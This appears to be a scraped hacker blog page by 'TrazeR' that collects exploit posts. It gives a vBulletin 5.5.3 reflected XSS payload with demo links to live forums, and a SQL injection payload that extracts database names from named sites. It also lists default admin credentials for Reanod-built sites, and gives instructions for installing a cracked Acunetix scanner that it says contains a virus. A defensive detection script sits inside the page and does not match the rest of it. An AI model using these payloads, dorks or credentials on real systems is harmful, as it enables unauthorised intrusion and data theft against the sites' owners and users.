vBulletin Reflected XSS via "Click here"

# Exploit Title: vBulletin Reflected XSS via "Click here"
# Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538


#################################################################################

Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"

vBulletin 5.5.3 Reflected XSS via "Click here"

Payload:

/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

The XSS fires when the "Click here!" link on the resulting page is clicked.
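A detection check for the request pattern shown in the payload above, as an added example (not part of the original advisory and not vBulletin code): it flags requests in which a loginerror_arr[...] parameter carries a URL scheme other than http/https, normalizing the value before reading the scheme. The function names, the allowlist and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: only http/https are acceptable targets for a link built from user input.
SAFE_SCHEMES = {"http", "https"}
_C0_AND_SPACE = "".join(map(chr, range(0x21)))          # stripped from both ends
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)   # RFC 3986 scheme syntax


def link_scheme(value):
    """Return the lower-cased scheme a browser would read from value, or None."""
    cleaned = value.strip(_C0_AND_SPACE)
    cleaned = re.sub(r"[\t\n\r]", "", cleaned)           # URL parsers drop these anywhere
    match = _SCHEME.match(cleaned)
    return match.group(1).lower() if match else None


def suspicious_loginerror(request_target):
    """Return [(param, scheme)] for loginerror_arr[...] values with a non-http(s) scheme."""
    hits = []
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes names and values, so encoded brackets are covered.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not name.lower().startswith("loginerror_arr["):
            continue
        scheme = link_scheme(value)
        if scheme and scheme not in SAFE_SCHEMES:
            hits.append((name, scheme))
    return hits


# Constructed request targets, as they would appear in a web server access log.
SAMPLES = [
    # the request pattern from the advisory
    "/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername"
    "&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin",
    # same parameter, percent-encoded with mixed case and embedded whitespace
    "/admincp/index.php?loginerror_arr%5B1%5D=%20JaVa%09Script%3Aalert(1)",
    # benign: ordinary https link
    "/admincp/index.php?loginerror_arr[1]=https://forum.example.test/lostpw",
    # benign: no URL-like value at all
    "/admincp/index.php?loginerror_arr[0]=badlogin&loginerror_arr[2]=1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(suspicious_loginerror(line) or "ok", "<-", line[:60])
```

The same scheme check belongs on the output side as well: a value that fails it should not be written into an href at all.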

Demo :

https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin



#################################################################################

> [Reference]
> https://hackerone.com/trazer
> https://www.trazer.org/
> https://www.cyber-warrior.org/194929/
> https://cxsecurity.com/author/TrazeR/1/

Designed by ORGINSTUDIOS.COM SQL Injection Vulnerability



#################################################################################
# Exploit Title: Designed by ORGINSTUDIOS.COM SQL Injection Vulnerability
# Author : TrazeR  & AKINCİLAR
# Google Dork : intext:"Designed by ORGINSTUDIOS.COM" inurl:catid
# Tested on : Windows 7
# Date : 01.07.2019
# Vendor Home: https://orginstudios.com/
# Blog : https://www.trazer.org/
# Forum : http://www.cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~# Tutorial :
[+] Dorking in Google or another search engine
[+] Sqlmap or manual
[+] GET parameter 'catid' is vulnerable

Demo: http://graphicarts.gr/portal/corp.php?catid=260'+and(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+aes_decrypt(aes_encrypt(%2f**%2fcOnCaT(0x217e21,%2f**%2fdAtAbAsE(),0x217e21),1),1))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)+and+'1'='1&cp=8&cntrid=


Demo 2 :  http://www.exaireton.com/mainsite/products.php?catid=37

Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: catid=-5607) OR 3893=3893-- HOfb

#AKINCILAR ! RESPECT THIS POWER !

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Acunetix 12.019* Linux Cracked

Acunetix 12.019 download: get the latest version from here. For problems with the installation or the crack, get in touch with @seytan6161 on Telegram.


Command: chmod +777 patch_aws


Command:  
./acunetix-12.9.0.sh
Run the file you downloaded by typing this, then set an email and password.

Note: when the installation finishes it will give you the machine address (https://kali:3443/).
The important point here is to apply the patch before opening the link
or running the tool.

We run the patch file at this path, granting it permission first if it has none.
If this path is not visible, you can find it by showing hidden folders.

/home/acunetix/.acunetix_trial/v_19xxxxxx/scanner/

Crack : ./patch_aws

You can then use it without any problems.


Acunetix 12.x Full Cracked

Peace be upon you ... I have shown how to turn Acunetix 12.x into the full version; in addition, image 8 shows the vulnerabilities it found. The images show how it is done. The crack contains a virus; you can use it locally.
Download Telegram: @Seytan6161. Pass on my greetings and you can get the Acunetix full crack :)










Burp Suite BurpBounty


Peace be upon you ...

Burp Bounty (listed in the BApp Store as Scan Check Builder) is an active and passive scanner. I preferred to install it manually. What I like about it is that it is a Burp Suite extension to which we can add our own payload list. This extension requires Burp Suite Pro.

Download:
BurpBounty
BurpBounty-v2.3.jar

XSS PAYLOAD LIST


Reanod Default Admin Password Vulnerability


#################################################################################
# Exploit Title: Reanod Default Admin Password Vulnerability
# Author : TrazeR & AKINCILAR
# Google Dork : intext:"Powered by reanod"
# Tested on : Kali Linux & Windows
# Date : 09.19.2018
# Vendor Home: http://www.reanod.com/
# Blog : http://www.trazer.org/
# Forum : http://cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~#
Tutorial :
[+] Dorking in Google or another search engine
[+] Manager-Url: /admin
[+] UserName: Reanod68 OR ===> admin
[+] Password: reanod6688

Demo:
http://www.ricemachinechina.com/admin.php

http://www.epic-crystal.com/wp-login.php

http://www.ynfmachineryparts.com/admin/

Greet'Z : AKINCILAR & Cyber-WarrioR.org And All Members

RESPECT THIS POWER !
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]